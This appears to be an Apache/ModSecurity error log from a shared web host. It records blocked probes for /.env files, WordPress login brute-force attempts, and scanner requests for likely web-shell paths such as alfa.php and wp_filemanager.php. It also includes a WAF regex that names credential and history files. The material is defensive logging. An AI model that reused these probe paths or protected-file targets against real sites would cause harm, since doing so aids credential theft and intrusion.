[Tue May 26 15:23:52.538401 2026] [security2:error] [pid 707292:tid 707471] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtsNKAqlRPSIEFAutxuQAAALY"]
[Tue May 26 15:23:54.006231 2026] [security2:error] [pid 707292:tid 707542] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtsdKAqlRPSIEFAutx6AAAAP0"]
[Tue May 26 15:23:55.828844 2026] [security2:error] [pid 707292:tid 707468] [client 196.119.67.174:64208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "godrejpest.co.in"] [uri "/.env"] [unique_id "ahVts9KAqlRPSIEFAutyLwAAALM"]
[Tue May 26 15:23:56.766427 2026] [security2:error] [pid 707292:tid 707506] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVttNKAqlRPSIEFAutyQQAAANk"]
[Tue May 26 15:23:58.735258 2026] [security2:error] [pid 707292:tid 707452] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtttKAqlRPSIEFAutydgAAAKM"]
[Tue May 26 15:23:59.012907 2026] [security2:error] [pid 707292:tid 707518] [client 113.183.177.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtttKAqlRPSIEFAutyhwAAAOU"]
[Tue May 26 15:24:00.373757 2026] [security2:error] [pid 707292:tid 707478] [client 31.57.184.20:53453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "toronto121mortgage.com"] [uri "/wp-login.php"] [unique_id "ahVtuNKAqlRPSIEFAutyqAAAAL0"], referer: https://www.google.com/
[Tue May 26 15:24:00.527545 2026] [security2:error] [pid 707292:tid 707533] [client 114.119.133.222:38775] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.krishnawoodworks.com"] [uri "/kww-stafflogin.php"] [unique_id "ahVtuNKAqlRPSIEFAutysAAAAPQ"], referer: http://www.krishnawoodworks.com/
[Tue May 26 15:24:00.964933 2026] [security2:error] [pid 707292:tid 707434] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtuNKAqlRPSIEFAutysgAAAJE"]
[Tue May 26 15:24:03.013532 2026] [security2:error] [pid 707292:tid 707517] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtutKAqlRPSIEFAuty5wAAAOQ"]
[Tue May 26 15:24:04.951956 2026] [security2:error] [pid 707292:tid 707426] [client 31.57.184.20:54260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "toronto121mortgage.com"] [uri "/wp-login.php"] [unique_id "ahVtvNKAqlRPSIEFAutzIAAAAIk"], referer: https://www.bing.com/
[Tue May 26 15:24:05.182325 2026] [security2:error] [pid 707292:tid 707352] [remote 88.198.91.116:33344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVtvdKAqlRPSIEFAutzIQAA-js"]
[Tue May 26 15:24:05.974038 2026] [security2:error] [pid 707292:tid 707496] [client 2600:3c03::f03c:95ff:fe72:1057:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVtvdKAqlRPSIEFAutzMwAAzy0"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 15:24:07.567638 2026] [security2:error] [pid 707292:tid 707355] [remote 167.71.130.119:48910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVtv9KAqlRPSIEFAutzXwAA6D4"]
[Tue May 26 15:24:07.609395 2026] [security2:error] [pid 707292:tid 707464] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtv9KAqlRPSIEFAutzWAAAAK8"]
[Tue May 26 15:24:08.111619 2026] [security2:error] [pid 707292:tid 707481] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtv9KAqlRPSIEFAutzawAAAMA"]
[Tue May 26 15:24:08.365450 2026] [security2:error] [pid 707292:tid 707361] [remote 3.208.180.187:39492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVtwNKAqlRPSIEFAutzdQAA6kQ"]
[Tue May 26 15:24:08.549744 2026] [security2:error] [pid 707292:tid 707359] [remote 173.249.21.166:35730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVtwNKAqlRPSIEFAutzfAAA30I"]
[Tue May 26 15:24:09.306464 2026] [security2:error] [pid 707292:tid 707463] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtwNKAqlRPSIEFAutziwAAAK4"]
[Tue May 26 15:24:11.594408 2026] [security2:error] [pid 707292:tid 707425] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtw9KAqlRPSIEFAutzxQAAAIg"]
[Tue May 26 15:24:13.553095 2026] [security2:error] [pid 707292:tid 707517] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtxdKAqlRPSIEFAutz8QAAAOQ"]
[Tue May 26 15:24:14.980362 2026] [security2:error] [pid 707292:tid 707524] [client 89.221.206.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtxtKAqlRPSIEFAut0GwAAAOs"], referer: https://www.anujtradingco.com/
[Tue May 26 15:24:16.129693 2026] [security2:error] [pid 707292:tid 707490] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtx9KAqlRPSIEFAut0MwAAAMk"]
[Tue May 26 15:24:16.168645 2026] [security2:error] [pid 707292:tid 707438] [client 89.221.206.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtyNKAqlRPSIEFAut0PwAAAJU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 15:24:16.280954 2026] [core:crit] [pid 707292:tid 707548] (13)Permission denied: [client 52.167.144.225:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:24:17.853809 2026] [security2:error] [pid 707292:tid 707501] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtydKAqlRPSIEFAut0ZQAAANQ"]
[Tue May 26 15:24:19.920651 2026] [security2:error] [pid 707292:tid 707547] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVty9KAqlRPSIEFAut0ngAAAQI"]
[Tue May 26 15:24:20.647992 2026] [security2:error] [pid 707292:tid 707443] [client 89.221.206.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtzNKAqlRPSIEFAut0swAAAJo"], referer: https://anujtradingco.com
[Tue May 26 15:24:21.243834 2026] [core:crit] [pid 707292:tid 707442] (13)Permission denied: [client 157.55.39.204:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:24:22.187158 2026] [security2:error] [pid 707292:tid 707486] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtzdKAqlRPSIEFAut01wAAAMU"]
[Tue May 26 15:24:23.079138 2026] [core:error] [pid 707292:tid 707447] [client 198.235.24.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:24:23.079160 2026] [core:error] [pid 707292:tid 707447] [client 198.235.24.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:24:24.192032 2026] [security2:error] [pid 707292:tid 707464] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtz9KAqlRPSIEFAut1EQAAAK8"]
[Tue May 26 15:24:25.850132 2026] [security2:error] [pid 707292:tid 707548] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt0dKAqlRPSIEFAut1PwAAAQM"]
[Tue May 26 15:24:28.180110 2026] [security2:error] [pid 707292:tid 707499] [client 113.168.135.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt09KAqlRPSIEFAut1cQAAANI"]
[Tue May 26 15:24:28.517445 2026] [security2:error] [pid 707292:tid 707443] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt1NKAqlRPSIEFAut1ggAAAJo"]
[Tue May 26 15:24:30.468463 2026] [security2:error] [pid 707292:tid 707456] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt1tKAqlRPSIEFAut1vgAAAKc"]
[Tue May 26 15:24:30.714707 2026] [security2:error] [pid 707292:tid 707458] [client 104.210.140.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.moes-art.com"] [uri "/index.php"] [unique_id "ahVt1dKAqlRPSIEFAut1sgAAAKk"]
[Tue May 26 15:24:32.696266 2026] [security2:error] [pid 707292:tid 707539] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt2NKAqlRPSIEFAut1_gAAAPo"]
[Tue May 26 15:24:32.923039 2026] [security2:error] [pid 707292:tid 707332] [remote 167.71.130.119:36886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVt2NKAqlRPSIEFAut2CwAA2ic"]
[Tue May 26 15:24:33.029020 2026] [security2:error] [pid 707292:tid 707426] [client 172.202.92.73:59587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVt2NKAqlRPSIEFAut2DAAAAIk"]
[Tue May 26 15:24:33.029181 2026] [security2:error] [pid 707292:tid 707426] [client 172.202.92.73:59587] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVt2NKAqlRPSIEFAut2DAAAAIk"]
[Tue May 26 15:24:33.540437 2026] [security2:error] [pid 707292:tid 707473] [client 176.65.139.233:29074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rbkgroups.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVt2dKAqlRPSIEFAut2GwAAALg"]
[Tue May 26 15:24:34.431244 2026] [security2:error] [pid 707292:tid 707453] [client 74.7.230.36:51508] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVt2tKAqlRPSIEFAut2QgAApDk"]
[Tue May 26 15:24:34.741282 2026] [security2:error] [pid 707292:tid 707548] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt2tKAqlRPSIEFAut2PAAAAQM"]
[Tue May 26 15:24:34.933945 2026] [security2:error] [pid 707292:tid 707477] [client 172.202.92.73:46161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/admin.php"] [unique_id "ahVt2tKAqlRPSIEFAut2UgAAALw"]
[Tue May 26 15:24:34.934054 2026] [security2:error] [pid 707292:tid 707477] [client 172.202.92.73:46161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/admin.php"] [unique_id "ahVt2tKAqlRPSIEFAut2UgAAALw"]
[Tue May 26 15:24:36.179896 2026] [security2:error] [pid 707292:tid 707472] [client 176.65.139.238:35966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "panda-eco.com"] [uri "/.env"] [unique_id "ahVt3NKAqlRPSIEFAut2dwAAALc"]
[Tue May 26 15:24:36.663602 2026] [proxy:error] [pid 707292:tid 707433] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:24:36.663670 2026] [proxy_http:error] [pid 707292:tid 707433] [client 176.65.139.236:61396] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:24:36.664236 2026] [proxy:error] [pid 707292:tid 707433] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:24:36.664270 2026] [proxy_http:error] [pid 707292:tid 707433] [client 176.65.139.236:61396] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:24:36.670311 2026] [security2:error] [pid 707292:tid 707505] [client 176.65.139.232:26322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.rbkgroups.co.in"] [uri "/.env"] [unique_id "ahVt3NKAqlRPSIEFAut2jAAAANg"]
[Tue May 26 15:24:36.671389 2026] [security2:error] [pid 707292:tid 707513] [client 176.65.139.231:35406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.rbkgroups.co.in"] [uri "/.env"] [unique_id "ahVt3NKAqlRPSIEFAut2jQAAAOA"]
[Tue May 26 15:24:36.715936 2026] [proxy:error] [pid 707292:tid 707496] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:24:36.716012 2026] [proxy_http:error] [pid 707292:tid 707496] [client 176.65.139.232:26336] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:24:36.716930 2026] [proxy:error] [pid 707292:tid 707496] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:24:36.716976 2026] [proxy_http:error] [pid 707292:tid 707496] [client 176.65.139.232:26336] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:24:36.819769 2026] [security2:error] [pid 707292:tid 707507] [client 176.65.139.234:45846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rbkgroups.co.in"] [uri "/.env"] [unique_id "ahVt3NKAqlRPSIEFAut2kgAAANo"]
[Tue May 26 15:24:37.064491 2026] [security2:error] [pid 707292:tid 707548] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt3NKAqlRPSIEFAut2hwAAAQM"]
[Tue May 26 15:24:37.202931 2026] [security2:error] [pid 707292:tid 707439] [client 172.202.92.73:59620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/goods.php"] [unique_id "ahVt3dKAqlRPSIEFAut2nAAAAJY"]
[Tue May 26 15:24:37.203049 2026] [security2:error] [pid 707292:tid 707439] [client 172.202.92.73:59620] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/goods.php"] [unique_id "ahVt3dKAqlRPSIEFAut2nAAAAJY"]
[Tue May 26 15:24:38.885661 2026] [security2:error] [pid 707292:tid 707508] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt3tKAqlRPSIEFAut2twAAANs"]
[Tue May 26 15:24:39.087511 2026] [security2:error] [pid 707292:tid 707436] [client 172.202.92.73:59633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/public/css.php"] [unique_id "ahVt39KAqlRPSIEFAut2xAAAAJM"]
[Tue May 26 15:24:39.087671 2026] [security2:error] [pid 707292:tid 707436] [client 172.202.92.73:59633] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/public/css.php"] [unique_id "ahVt39KAqlRPSIEFAut2xAAAAJM"]
[Tue May 26 15:24:41.047599 2026] [security2:error] [pid 707292:tid 707479] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt4NKAqlRPSIEFAut26AAAAL4"]
[Tue May 26 15:24:41.225061 2026] [security2:error] [pid 707292:tid 707543] [client 172.202.92.73:59595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/alfa.php"] [unique_id "ahVt4dKAqlRPSIEFAut2-AAAAP4"]
[Tue May 26 15:24:41.225230 2026] [security2:error] [pid 707292:tid 707543] [client 172.202.92.73:59595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/alfa.php"] [unique_id "ahVt4dKAqlRPSIEFAut2-AAAAP4"]
